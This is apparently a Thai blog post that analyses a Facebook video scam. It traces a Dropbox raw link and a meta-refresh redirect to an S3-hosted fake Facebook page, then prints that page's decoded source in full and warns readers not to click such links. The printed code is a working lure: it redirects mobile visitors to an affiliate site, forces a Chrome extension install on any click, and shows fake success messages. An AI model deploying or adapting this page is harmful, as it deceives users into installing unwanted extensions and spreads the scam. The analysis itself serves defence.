มัน link ไปหา dropbox จริงๆครับแต่มันจะทำ link เป็น https://www.dropbox.com/s/z12b1j3augfdwgv/havifegedofelevudipe.html?raw=1 ซึ่งการส่งค่า raw=1 เข้าไปจะทำให้ dropbox exe html file (ถ้าเราตัด ?raw=1 จะเป็นหน้า download file) เมื่อดุใน source code จะเจอว่ามีแค่ บรรทัดเดียวคือ redirect ไปหาอีกเว็บ
<meta http-equiv="refresh" content="0;url=http://032zl6p.s3.amazonaws.com/index.html?add"/> Loader
และเมื่อเราตามไปที่เว็บนั้นจะเจอหน้าเว็บที่ผู้ใช้ facebook กด link ไปแล้วเจอ
เป็นหน้า facebook หลอกที่ทำเป็นว่ามี vdo รอให้กด เมื่อเข้าไปดู source code ของหน้านี้จะพบว่าเข้ารหัสไว้
ซึ่งเป็นการเข้ารหัสง่ายๆด้วยคำสั่ง unescape เฉยๆ แกะง่ายๆโดนไปหาเว็บ online decode เอาผมลองใช้เว็บ http://www.utilities-online.info/urlencode/#.VRvArWSqqko แกะดูได้ source ตามนี้
<html xmlns="http://www.w3.org/1999/xhtml" prefix="og: http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script> var okkkkk = "amokjilhfcgjcbbbihfbpbacbfdedehp"; new Image().src = "http://whos.amung.us/widget/danielpr1.png"; (function(a, b) { if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) window.location = b })(navigator.userAgent || navigator.vendor || window.opera, 'http://mobileredirect.net/?affilysismedia'); </script> <title>Facebook - Video Special - facebook.com</title> <link rel="stylesheet" href="./index_files/style.css" type="text/css" media="screen"> <script src="//code.jquery.com/jquery-1.7.2.min.js"></script> <link rel="shortcut icon" href="https://fbstatic-a.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico"> </head> <script> document.write('<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/' + okkkkk + '">'); </script> <body onclick="chromex();"> <div id="fb-root"></div> <div id="header"> <div id="bar"></div> </div> <div id="main"> <div id="contenido"> <div id="contenido-bg"></div> <div id="titulo">Facebook - Video Special - facebook.com</div> <!-- #### VIDEO ### --> <div class="youtubeblocker" style="width:500px;height:300px;background:#000000;"> <div class="image" style="background-image: url('../wp-content/uploads/2014/07/fgfdgpl.jpg')"></div> <div class="play-button"></div> <div class="controlls"> <div class="left-controlls"></div> <div class="right-controlls"></div> </div> <div class="overlay"></div> <div class="sharebox"></div> </div> <!-- #### VIDEO ### --> <div id="titulo-bottom"> <a href="http://global.affilysis.com/directclick/?aid=27215&uid=1388"><img src="http://www.affilysis.com/dsg.gif"></a> </div> <div id="fb-root"></div> <fb:comments href="http://v2.vidsawesome.com/?videos=pierde-la-virginidad-video-regazza-perdere-la-verginita-molto-duro" num_posts="10" width="500"></fb:comments> </div> <div id="sidebar"> <div id="sidebar-bg"></div> </div> </div> <div id="undeContinue" style="background: #000; height: 100%; opacity: 0.5; position: fixed; width: 100%; z-index: 99; top: 0; left: 0; display: none;"></div> <div id="continue" style="background: no-repeat center; width: 379px; height: 76px; position: fixed; left: 50%; top: 305px; margin-left: -190px; display: none; z-index: 100;"></div> <script type="text/javascript"> $(document).ready(function() { $('.youtubeblocker').click(function() { chromex(); }); }); var addBox = document.getElementById('continue'); var anderBox = document.getElementById('undeContinue'); var pathByLang = { 'ar': 'ar', 'de': 'de', 'en': 'en', 'hi': 'hi', 'id': 'id', 'it': 'it', 'ja': 'ja', 'nl': 'nl', 'fa': 'pe', 'pt': 'pt', 'th': 'th', 'fi': 'tl', 'tr': 'tr', 'vi': 'vi' }; var userLang = navigator.language || navigator.userLanguage; var langKey = userLang.substr(0, 2); switch (pathByLang[langKey]) { case 'hi': addBox.style.top = '450px'; break; case 'ja': addBox.style.top = '330px'; break; case undefined: langKey = 'en'; break; } addBox.style.backgroundImage = "".concat('url("http://lp.ilividnewtab.com/images/chrome_extension/',pathByLang[langKey],'/ilividnewtab-continue.png")'); function chromex() { chrome.webstore.install('https://chrome.google.com/webstore/detail/' + okkkkk + '', function() { document.getElementsByTagName("body")[0].setAttribute("style", "background-color: #6ee552;"); new Image().src = "http://whos.amung.us/widget/danile0x2.png"; titulo.innerHTML = " Thx For Your Setup, Setup Successfully. Please Wait 3 Seconds, Video Starting..."; alert('Thx For Your Setup, Setup Successfully. \r\n Please Wait 3 Seconds, Video Starting.'); location.href = "http://goo.gl/Rz4YM0"; setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #6ee552;");', 1000); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 1500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #6ee552;");', 2000); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 2500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #6ee552;");', 3000); setTimeout('window.close();', 4000); setTimeout('anderBox.style.display = "none"', 500); setTimeout('addBox.style.display = "none";', 1000); }, function(err) { document.getElementsByTagName("body")[0].setAttribute("style", "background-color: red;"); titulo.innerHTML = "Ooopps ! you canceled setup, Please add Add Player Add Button..."; alert('Ooopps ! you canceled setup, Please add Add Player Add Button...'); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: red;");', 1000); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 1500); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: red;");', 2000); setTimeout('document.getElementsByTagName("body")[0].setAttribute("style","background-color: #f9f9f9;");', 2500); setTimeout('anderBox.style.display = "none"', 500); setTimeout('addBox.style.display = "none";', 1000); }); setTimeout('anderBox.style.display = "block"', 500); setTimeout('addBox.style.display = "block";', 1000); } </script> </body> </html>
หลักๆก็น่าจะเป็นหลอกให้กดเพื่อเก็บ token ของเรา และ auto share + tag ให้เพื่อนเราเห็นมากที่สุดกระจายตัวไปเรื่อยๆ ใครที่เป็น link อะไรแปลกๆที่ไม่น่าจะปรากฏใน facebook ก็อย่าไปกดเลยครับ อย่างอันนี้ link vdo แต่ url มาจาก dropbox ซึ่งน่าแปลกมาก มันเอา url dropbox มารับหน้าให้ดูน่าเชื่อถือแล้ว redirect ไปหา url เว็บของตัวเอง